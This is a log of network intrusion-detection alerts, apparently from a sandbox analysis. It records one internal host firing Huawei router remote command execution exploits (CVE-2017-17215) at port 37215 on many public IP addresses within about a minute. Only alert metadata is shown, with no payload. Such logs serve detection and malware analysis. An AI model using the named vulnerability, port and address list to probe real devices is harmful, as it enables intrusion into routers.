                                            06/14/24-10:44:22.878423TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4339837215192.168.2.14197.89.56.246
                                            06/14/24-10:44:04.411137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459637215192.168.2.14156.74.122.245
                                            06/14/24-10:44:08.504812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277837215192.168.2.14197.34.29.176
                                            06/14/24-10:44:22.857974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422837215192.168.2.14156.138.210.201
                                            06/14/24-10:44:14.668395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737837215192.168.2.14197.223.90.147
                                            06/14/24-10:43:41.847013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644037215192.168.2.1441.57.51.43
                                            06/14/24-10:44:14.672015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970637215192.168.2.14156.97.111.185
                                            06/14/24-10:44:02.369039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534237215192.168.2.1441.3.86.96
                                            06/14/24-10:43:39.808814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4904837215192.168.2.14197.134.170.190
                                            06/14/24-10:43:50.074343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601237215192.168.2.1441.82.168.203
                                            06/14/24-10:44:31.051512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618037215192.168.2.1441.149.67.225
                                            06/14/24-10:44:04.407944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050837215192.168.2.14197.35.175.67
                                            06/14/24-10:44:22.860213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566037215192.168.2.1441.39.110.232
                                            06/14/24-10:43:43.972068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079837215192.168.2.1441.172.149.138
                                            06/14/24-10:44:10.567483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5235037215192.168.2.14156.71.196.200
                                            06/14/24-10:44:00.334628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5441437215192.168.2.14197.100.132.245
                                            06/14/24-10:44:10.563586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4846437215192.168.2.14156.213.233.168
                                            06/14/24-10:44:33.150903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4591637215192.168.2.14197.92.141.64
                                            06/14/24-10:44:08.503729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5675637215192.168.2.14197.178.164.241
                                            06/14/24-10:43:41.848128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4072437215192.168.2.1441.255.10.162
                                            06/14/24-10:44:08.504656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965637215192.168.2.14197.55.58.25
                                            06/14/24-10:44:14.688427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597837215192.168.2.1441.245.17.111
                                            06/14/24-10:43:52.160400TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5484037215192.168.2.14197.133.86.189
                                            06/14/24-10:43:37.762516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803437215192.168.2.1441.197.170.95
                                            06/14/24-10:44:16.716998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155237215192.168.2.1441.94.249.43
                                            06/14/24-10:44:18.766144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219837215192.168.2.1441.167.239.19
                                            06/14/24-10:44:27.002291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085637215192.168.2.14197.20.131.15
                                            06/14/24-10:44:18.763355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4251037215192.168.2.14156.12.173.106
                                            06/14/24-10:43:39.811740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5526037215192.168.2.14156.163.12.193
                                            06/14/24-10:43:34.663517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987437215192.168.2.1441.221.245.45
                                            06/14/24-10:44:16.735058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868837215192.168.2.14197.234.191.209
                                            06/14/24-10:44:18.764040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219837215192.168.2.14156.45.143.180
                                            06/14/24-10:44:04.405363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558637215192.168.2.14156.55.102.177
                                            06/14/24-10:43:54.184216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4633637215192.168.2.1441.200.138.245
                                            06/14/24-10:43:56.225047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5275437215192.168.2.14197.151.25.202
                                            06/14/24-10:43:54.199024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652237215192.168.2.1441.146.18.165
                                            06/14/24-10:44:29.024763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232037215192.168.2.14197.84.19.38
                                            06/14/24-10:44:14.670122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835637215192.168.2.14156.147.24.19
                                            06/14/24-10:44:29.021891TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467637215192.168.2.14197.93.116.7
                                            06/14/24-10:44:20.828694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423637215192.168.2.14197.189.66.219
                                            06/14/24-10:44:31.052384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703437215192.168.2.14156.246.176.204
                                            06/14/24-10:44:24.944087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152437215192.168.2.14156.56.57.5
                                            06/14/24-10:44:08.501438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5864437215192.168.2.14156.119.11.197
                                            06/14/24-10:44:12.616348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4633437215192.168.2.14197.226.114.103
                                            06/14/24-10:44:29.027420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516837215192.168.2.14197.41.51.67
                                            06/14/24-10:44:29.010986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942837215192.168.2.14197.213.9.208
                                            06/14/24-10:44:18.762062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571037215192.168.2.14197.128.241.182
                                            06/14/24-10:44:20.829488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427837215192.168.2.14156.112.147.116
                                            06/14/24-10:43:58.273936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3605637215192.168.2.14156.24.40.117
                                            06/14/24-10:44:33.131960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699037215192.168.2.1441.63.144.57
                                            06/14/24-10:44:35.180537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867437215192.168.2.14197.192.167.86
                                            06/14/24-10:44:00.344357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201437215192.168.2.1441.234.167.47
                                            06/14/24-10:44:14.688207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3290037215192.168.2.14156.231.88.177
                                            06/14/24-10:44:00.324078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114437215192.168.2.14197.186.194.186
                                            06/14/24-10:43:37.762902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414037215192.168.2.1441.152.236.8
                                            06/14/24-10:44:00.319833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160237215192.168.2.1441.129.151.15
                                            06/14/24-10:44:35.176986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3353437215192.168.2.14197.24.57.93
                                            06/14/24-10:44:16.737850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3801037215192.168.2.14197.117.157.79
                                            06/14/24-10:44:22.858245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716437215192.168.2.14197.161.75.4
                                            06/14/24-10:43:45.991009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715637215192.168.2.14197.96.82.85
                                            06/14/24-10:43:48.021590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440437215192.168.2.14156.107.252.247
                                            06/14/24-10:44:26.999845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4284637215192.168.2.14156.232.55.57
                                            06/14/24-10:43:58.276690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789237215192.168.2.14197.137.81.29
                                            06/14/24-10:44:14.681725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922437215192.168.2.14197.127.198.223
                                            06/14/24-10:44:22.882102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3473437215192.168.2.1441.223.39.145
                                            06/14/24-10:43:52.150757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5472237215192.168.2.14197.187.143.194
                                            06/14/24-10:43:48.031708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493237215192.168.2.1441.1.231.31
                                            06/14/24-10:43:58.274546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4468637215192.168.2.14156.189.83.132
                                            06/14/24-10:44:18.778052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872437215192.168.2.14197.236.87.61
                                            06/14/24-10:44:10.581477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821637215192.168.2.1441.109.146.252
                                            06/14/24-10:43:45.987209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954637215192.168.2.14156.127.92.201
                                            06/14/24-10:43:58.275752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003637215192.168.2.1441.200.174.49
                                            06/14/24-10:44:16.718269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4955637215192.168.2.1441.73.243.124
                                            06/14/24-10:44:20.806920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811037215192.168.2.14197.213.193.91
                                            06/14/24-10:43:52.164073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548637215192.168.2.1441.79.58.87
                                            06/14/24-10:44:20.805391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3702437215192.168.2.14156.120.137.247
                                            06/14/24-10:43:39.809442TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291237215192.168.2.1441.52.240.124
                                            06/14/24-10:44:00.337880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794637215192.168.2.14197.115.77.28
                                            06/14/24-10:43:54.200351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5395437215192.168.2.1441.85.2.124
                                            06/14/24-10:44:26.977526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5094437215192.168.2.14156.45.27.148
                                            06/14/24-10:43:58.273510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669837215192.168.2.1441.255.211.29
                                            06/14/24-10:44:31.052293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080637215192.168.2.14156.111.45.59
                                            06/14/24-10:43:39.790472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025637215192.168.2.14197.212.160.21
                                            06/14/24-10:44:20.803677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424837215192.168.2.14156.54.168.158
                                            06/14/24-10:43:52.146198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535437215192.168.2.14197.139.59.59
                                            06/14/24-10:43:58.277239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425037215192.168.2.1441.195.34.188
                                            06/14/24-10:44:22.861740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5179237215192.168.2.14197.191.7.25
                                            06/14/24-10:43:36.702888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455437215192.168.2.14156.82.229.143
                                            06/14/24-10:43:54.184984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636637215192.168.2.14156.70.192.24
                                            06/14/24-10:43:54.202973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323637215192.168.2.1441.231.133.23
                                            06/14/24-10:44:12.640762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456037215192.168.2.14156.198.81.166
                                            06/14/24-10:44:14.667165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5343037215192.168.2.1441.41.229.92
                                            06/14/24-10:44:29.022714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488637215192.168.2.14156.184.43.122
                                            06/14/24-10:44:26.980105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177237215192.168.2.14156.249.138.11
                                            06/14/24-10:44:06.452358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762637215192.168.2.14156.82.40.196
                                            06/14/24-10:44:14.669159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919037215192.168.2.14156.57.32.173
                                            06/14/24-10:43:36.703055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842437215192.168.2.14156.31.90.73
                                            06/14/24-10:43:54.185960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.14156.152.82.26
                                            06/14/24-10:44:26.985143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403437215192.168.2.1441.254.245.39
                                            06/14/24-10:44:31.078411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4296637215192.168.2.14197.179.219.101
                                            06/14/24-10:43:52.146474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700637215192.168.2.14197.14.102.91
                                            06/14/24-10:44:12.646923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3544837215192.168.2.14156.212.182.64
                                            06/14/24-10:44:31.086757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4698437215192.168.2.14197.61.29.5
                                            06/14/24-10:44:04.412022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.14197.172.215.220
                                            06/14/24-10:44:35.178313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4648837215192.168.2.1441.43.2.221
                                            06/14/24-10:43:50.113964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3523637215192.168.2.14156.65.76.20
                                            06/14/24-10:44:02.366157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852237215192.168.2.14156.195.84.109
                                            06/14/24-10:44:06.452038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570837215192.168.2.1441.21.217.185
                                            06/14/24-10:43:39.812574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5478037215192.168.2.1441.50.29.253
                                            06/14/24-10:44:18.764952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5062837215192.168.2.1441.2.65.207
                                            06/14/24-10:43:37.761174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5845037215192.168.2.14197.183.73.141
                                            06/14/24-10:44:18.778378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118437215192.168.2.14197.239.17.254
                                            06/14/24-10:43:58.291645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4232437215192.168.2.1441.62.120.12
                                            06/14/24-10:43:52.160491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252237215192.168.2.14156.156.78.21
                                            06/14/24-10:44:20.827618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4856237215192.168.2.1441.92.139.46
                                            06/14/24-10:44:06.469956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788637215192.168.2.1441.52.190.142
                                            06/14/24-10:44:33.134924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3955437215192.168.2.1441.145.239.165
                                            06/14/24-10:44:02.367151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5273237215192.168.2.1441.164.228.85
                                            06/14/24-10:44:06.452882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803037215192.168.2.14156.32.46.44
                                            06/14/24-10:43:37.763184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708637215192.168.2.14197.66.87.230
                                            06/14/24-10:44:04.419677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4791837215192.168.2.1441.253.169.51
                                            06/14/24-10:44:29.013859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092037215192.168.2.14197.84.39.183
                                            06/14/24-10:43:50.072035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855437215192.168.2.14156.24.153.66
                                            06/14/24-10:44:12.625386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787237215192.168.2.1441.200.73.123
                                            06/14/24-10:44:24.916832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3954637215192.168.2.1441.32.11.110
                                            06/14/24-10:43:39.792891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413037215192.168.2.14156.33.234.192
                                            06/14/24-10:44:18.766858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4122037215192.168.2.14156.225.144.59
                                            06/14/24-10:43:39.807989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916037215192.168.2.14197.45.248.216
                                            06/14/24-10:44:22.862187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420037215192.168.2.14156.60.168.238
                                            06/14/24-10:44:06.472258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3562237215192.168.2.1441.96.80.90
                                            06/14/24-10:44:16.716612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789037215192.168.2.1441.30.102.243
                                            06/14/24-10:44:14.668343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155037215192.168.2.1441.40.95.78
                                            06/14/24-10:44:10.547894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860437215192.168.2.14156.29.176.44
                                            06/14/24-10:43:41.849860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5895437215192.168.2.14197.115.149.12
                                            06/14/24-10:44:04.420638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033637215192.168.2.14156.116.4.46
                                            06/14/24-10:43:54.182760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913837215192.168.2.1441.131.124.108
                                            06/14/24-10:43:54.186256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4339237215192.168.2.1441.183.15.125
                                            06/14/24-10:43:36.702596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6097237215192.168.2.14197.221.214.189
                                            06/14/24-10:43:34.662201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081637215192.168.2.1441.162.173.241
                                            06/14/24-10:43:36.725941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5840437215192.168.2.14156.211.212.107
                                            06/14/24-10:44:22.859300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184037215192.168.2.14197.117.210.2
                                            06/14/24-10:44:04.411713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3686837215192.168.2.14156.254.228.115
                                            06/14/24-10:43:36.729585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5089037215192.168.2.1441.241.231.209
                                            06/14/24-10:43:37.760679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3820837215192.168.2.14156.184.105.154
                                            06/14/24-10:43:34.679206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164637215192.168.2.14197.3.132.219
                                            06/14/24-10:44:04.404346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313037215192.168.2.14197.200.74.144
                                            06/14/24-10:44:22.860184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5665837215192.168.2.1441.132.237.230
                                            06/14/24-10:43:45.984357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5359437215192.168.2.1441.73.209.107
                                            06/14/24-10:44:10.544683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782237215192.168.2.1441.206.75.9
                                            06/14/24-10:44:22.882704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4300237215192.168.2.1441.153.62.180
                                            06/14/24-10:43:36.703152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5080637215192.168.2.1441.155.196.190
                                            06/14/24-10:43:43.941838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997037215192.168.2.14197.153.255.124
                                            06/14/24-10:43:54.182234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3806437215192.168.2.1441.93.10.142
                                            06/14/24-10:44:29.011324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3682237215192.168.2.14156.89.216.51
                                            06/14/24-10:44:06.469615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4720037215192.168.2.14197.186.111.102
                                            06/14/24-10:43:36.724501TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541837215192.168.2.14197.29.229.122
                                            06/14/24-10:44:00.323872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4571837215192.168.2.14156.148.164.14
                                            06/14/24-10:44:18.779301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590637215192.168.2.14197.124.152.157
                                            06/14/24-10:43:52.143188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015437215192.168.2.1441.137.98.72
                                            06/14/24-10:44:16.735463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4196837215192.168.2.14197.43.10.0
                                            06/14/24-10:43:43.943897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3537637215192.168.2.14197.133.76.151
                                            06/14/24-10:43:58.275958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658237215192.168.2.1441.70.190.19
                                            06/14/24-10:44:00.323969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486237215192.168.2.14197.214.141.118
                                            06/14/24-10:43:36.717532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4270437215192.168.2.1441.198.119.197
                                            06/14/24-10:43:39.810107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519037215192.168.2.14156.115.84.103
                                            06/14/24-10:43:54.186565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5543037215192.168.2.14156.216.198.120
                                            06/14/24-10:43:45.984437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087237215192.168.2.14156.13.5.193
                                            06/14/24-10:44:12.644829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400237215192.168.2.14156.245.87.132
                                            06/14/24-10:43:48.028363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4238437215192.168.2.1441.148.207.6
                                            06/14/24-10:44:22.857497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651637215192.168.2.1441.146.218.163
                                            06/14/24-10:43:52.149509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641837215192.168.2.14197.239.58.112
                                            06/14/24-10:43:37.760411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668637215192.168.2.1441.177.59.243
                                            06/14/24-10:44:16.735568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3936437215192.168.2.14197.89.217.219
                                            06/14/24-10:44:31.057484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285837215192.168.2.1441.61.146.222
                                            06/14/24-10:43:39.808324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525637215192.168.2.14156.81.34.45
                                            06/14/24-10:43:52.160848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4881237215192.168.2.14197.171.217.57
                                            06/14/24-10:44:16.719072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5298437215192.168.2.14197.103.86.152
                                            06/14/24-10:43:45.967082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827037215192.168.2.14197.0.58.100
                                            06/14/24-10:44:29.024186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980437215192.168.2.14197.159.78.192
                                            06/14/24-10:44:06.453836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291637215192.168.2.1441.9.122.55
                                            06/14/24-10:44:20.831363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663237215192.168.2.14197.125.43.2
                                            06/14/24-10:44:24.913699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871837215192.168.2.1441.244.125.60
                                            06/14/24-10:44:26.979684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865437215192.168.2.14156.38.136.68
                                            06/14/24-10:43:36.729978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800437215192.168.2.14156.188.235.22
                                            06/14/24-10:44:31.052165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3488037215192.168.2.14156.200.185.88
                                            06/14/24-10:44:24.943485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5106237215192.168.2.1441.204.92.66
                                            06/14/24-10:43:41.848328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556037215192.168.2.1441.5.202.197
                                            06/14/24-10:44:24.943669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4324037215192.168.2.1441.121.253.76
